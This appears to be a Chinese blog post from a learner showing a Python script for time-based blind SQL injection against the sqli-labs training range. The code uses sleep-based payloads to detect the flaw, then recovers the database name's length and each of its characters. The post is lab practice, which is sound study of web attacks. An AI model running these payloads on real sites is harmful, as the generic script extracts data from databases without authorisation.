利用python对sqli_lab靶场进行时间盲注

学习利用python编写简单poc,代码挺简单的,只考虑了判断是否存在漏洞,获取长度,获取数据库名;

获取表名,列名,未编写.....主要是懒!修改相应payload即可~

import  time
import requests

def Judge(url):

    payload ="' and if(1,sleep(5),1) --+"
    new_url = url + payload
    StartTime = time.time()
    #print(new_url)
    req = requests.get(new_url)
    if time.time() - StartTime > 5:
        print("[+] URL is vulnerable")
        flag = True
        return flag
    else:
        print("[-] URL is unvulnerable")
        flag = False
        return flag

def GetLength(url):
    for i in range(1,30):
        payload = "' and if(length(database())=%d,sleep(5),1) --+"%i
        Starttime = time.time()
        new_url = url + payload
        req = requests.get(new_url)
        if time.time() - Starttime > 5:
            print("database length is %d"%i)
            return i
            break


def GetDataName(url,len):
    str = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789'
    for i in range(1,len+1):
        for j in str:
            payload = "' and if(substr(database(),%d,1)='%s',sleep(5),1) --+"%(i,j)
            new_url = url + payload
            Starttime = time.time()
            req = requests.get(new_url)
            if time.time() - Starttime > 5 :
                Database =''
                Database += j
                print (Database,end='')
                break

GetDataName("http://xxx/Less-9/?id=1",8)

在GetDataName()里面,可以用ascii包围substr(),我这里直接用截取字符串了,%s一定得记住加上单引号,截取的格式是字符串;

代码比较简陋,复用率低,payload语句可以单独封装.